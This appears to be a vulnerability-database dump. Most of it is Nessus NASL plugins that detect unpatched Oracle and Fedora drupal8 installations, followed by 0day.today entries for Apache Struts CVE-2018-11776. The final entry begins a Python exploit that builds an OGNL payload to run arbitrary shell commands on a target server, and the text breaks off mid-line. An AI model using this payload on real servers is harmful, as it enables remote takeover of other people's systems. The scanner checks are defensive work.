script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'MySQL Enterprise Monitor';\nport = get_http_port(default:18443);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:true);\n\nconstraints = [\n {'min_version' : '3.4', 'fixed_version' : '3.4.10'},\n {'min_version' : '4.0', 'fixed_version' : '4.0.7'},\n {'min_version' : '8.0', 'fixed_version' : '8.0.3'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:35", "description": "The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and 13.4.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). Supported versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Enterprise Manager Base Platform executes to compromise Enterprise Manager Base Platform. Successful attacks of this vulnerability can result in takeover of Enterprise Manager Base Platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776", "CVE-2019-0227", "CVE-2019-12415", "CVE-2020-2982", "CVE-2020-9546"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/138555", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138555);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2018-11776\",\n \"CVE-2019-0227\",\n \"CVE-2019-12415\",\n \"CVE-2020-2982\",\n \"CVE-2020-9546\"\n );\n script_bugtraq_id(105125, 107867);\n script_xref(name:\"IAVA\", value:\"2020-A-0326\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Jul 2020 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are\naffected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and\n 13.4.0.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 9.8 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported\n versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 8.1 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). Supported\n versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with access to the physical\n communication segment attached to the hardware where the\n Enterprise Manager Base Platform executes to compromise\n Enterprise Manager Base Platform. Successful attacks of\n this vulnerability can result in takeover of Enterprise\n Manager Base Platform. CVSS 3.1 Base Score 7.5\n (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpujul2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-9546\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Oracle Enterprise Manager Cloud Control';\n\napp_info = vcf::get_app_info(app:app_name);\n\n# affected versions and patches \n# (mapping added in oracle_enterprise_manager_installed.nbin)\n#\n# 13.4.0\n# 31459685 -> 13.4.0.4\n#\n# 13.3.0.0\n# 31250768 -> 13.3.0.0.200714\n#\n# 12.1.0.5\n# 31250739 -> 12.1.0.5.200714\n \nconstraints = [\n { 'min_version' : '13.4.0.0', 'fixed_version' : '13.4.0.4', 'fixed_display': '13.4.0.4 (Patch 31459685)'},\n { 'min_version' : '13.3.0.0', 'fixed_version' : '13.3.0.0.200714', 'fixed_display': '13.3.0.0.200714 (Patch 31250768)'},\n { 'min_version' : '12.1.0.5', 'fixed_version' : '12.1.0.5.200714', 'fixed_display': '12.1.0.5.200714 (Patch 31250739)' }\n];\n \nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:53:59", "description": "- [8.3.9](https://www.drupal.org/project/drupal/releases/8 .3.9)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002 )\n\n - [8.3.8](https://www.drupal.org/project/drupal/releases/8 .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-04-24T00:00:00", "type": "nessus", "title": "Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-922CC2FBAA.NASL", "href": "https://www.tenable.com/plugins/nessus/109288", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-922cc2fbaa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109288);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-922cc2fbaa\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-001\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal8-8.3.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:58:53", "description": "- [8.4.6](https://www.drupal.org/project/drupal/releases/8 .4.6)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002 )\n\n - [8.4.5](https://www.drupal.org/project/drupal/releases/8 .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n - [8.4.4](https://www.drupal.org/project/drupal/releases/8 .4.4)\n\n - [8.4.3](https://www.drupal.org/project/drupal/releases/8 .4.3)\n\n - [8.4.2](https://www.drupal.org/project/drupal/releases/8 .4.2)\n\n - [8.4.1](https://www.drupal.org/project/drupal/releases/8 .4.1)\n\n - [8.4.0](https://www.drupal.org/project/drupal/releases/8 .4.0)\n\n - [8.4.0-rc2](https://www.drupal.org/project/drupal/releas es/8.4.0-rc2)\n\n - [8.4.0-rc1](https://www.drupal.org/project/drupal/releas es/8.4.0-rc1)\n\n - [8.4.0-beta1](https://www.drupal.org/project/drupal/rele ases/8.4.0-beta1)\n\n - [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-906BA26B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/120615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-906ba26b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120615);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-906ba26b4d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n [8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-906ba26b4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.6-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and in same time, its upper action(s) have no or wildcard\r\nnamespace. Same possibility when using url tag which doesnat have value\r\nand action set and in same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@[email\u00a0protected]('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@[email\u00a0protected]().getOutputStream())).\"\r\n ognl_payload += \"(@[email\u00a0protected](#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: 